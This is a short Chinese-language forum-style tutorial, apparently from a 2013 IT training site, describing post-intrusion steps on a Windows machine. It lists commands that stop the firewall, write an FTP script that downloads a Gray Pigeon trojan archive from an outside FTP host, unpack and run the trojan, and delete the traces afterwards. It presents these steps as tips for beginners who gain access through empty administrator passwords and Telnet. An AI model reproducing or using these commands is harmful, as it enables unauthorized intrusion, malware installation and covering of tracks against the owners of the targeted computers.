你所在的位置: 首页 > 红帽认证 > RHCA >
最新开班 班级 报名状态
9月16日 HCNP-R&S(含初级) 热招中
9月18日 RHCSA脱产班 热招中
9月25日 HCNA-Cloud Service 热招中
9月25日 HCNA-Cloud Service 热招中
9月30日 HCNA-R&S周末班 热招中
10月31日 HCNP-storage脱产班 热招中
10月23日 HCNA-storage脱产班 热招中
10月20日 HCNP-R&S脱产班 热招中
10月10日 HCIE-R&S脱产班 热招中
10月9日 HCNA-R&S脱产班 热招中
  • 博赛网络ICT就业班热招中
  • 博赛推出Oracle OCM实战课程

解决Telnet入侵在FTP空间存放木马

时间:2013-09-30 14:42 作者:Superthink 点击:

本人菜鸟,不少菜鸟跟我一样,学了135端口扫描Administrator空口令,再利用Recton开启对方Telnet(23端口)进行入侵。

学了这个教程之后,找免费的FTP就很费劲了。我还中了一次毒,恢复了一次备分,现在流氓软件太多了,鄙视一下先。找到免费FTP后,还不让传EXE文件,别问我做没做免杀加没加壳,我随随便便上传个EXE都不让。这是FTP做了限制,不让你传马。 好了,言归正传,下面教大家几点小技巧,就是把马压缩起来传上去。

下面是某些教程里给的TXT说明,我整理后搬到这里来了,后面一段是我自己加上去的。

 

关闭防火墙 net stop sharedaccess
d:

1、echo open ftp.go1.icpcn.com>>tty.txt         登陆FTP服务器
2、echo guniao>>tty.txt                         用户名
3、echo 1234567>>tty.txt                        密码
4、echo bin>>tty.txt                            开始
5、echo get 123.rar>>tty.txt                    下载灰鸽子木马的压缩包
6、echo bye>>tty.txt                            关闭FTP服务器
 

输入上面命令后,在远程计算机上就会生成一个tty.txt文件,内容为:

 

open ftp.go1.icpcn.com
guniao
1234567
bin
get 123.rar
bye
 

现在我们在远程计算机上执行下面的命令:

 

ftp -s:tty.txt
 

意思是,读取tty.txt里的参数,执行ftp命令,命令执行完后,灰鸽子木马文件123.rar就下载到对方计算机里了。

 

del d:\tty.txt

c:
cd program files
cd winrar
winrar e d:123.rar d:
 

然后进到D盘下,执行一下自己的木马EXE文件,最后别忘记把压缩包和EXE文件给删除掉。

(责任编辑:Superthink)

评论列表(网友评论仅供网友表达个人看法,并不表明本站同意其观点或证实其描述)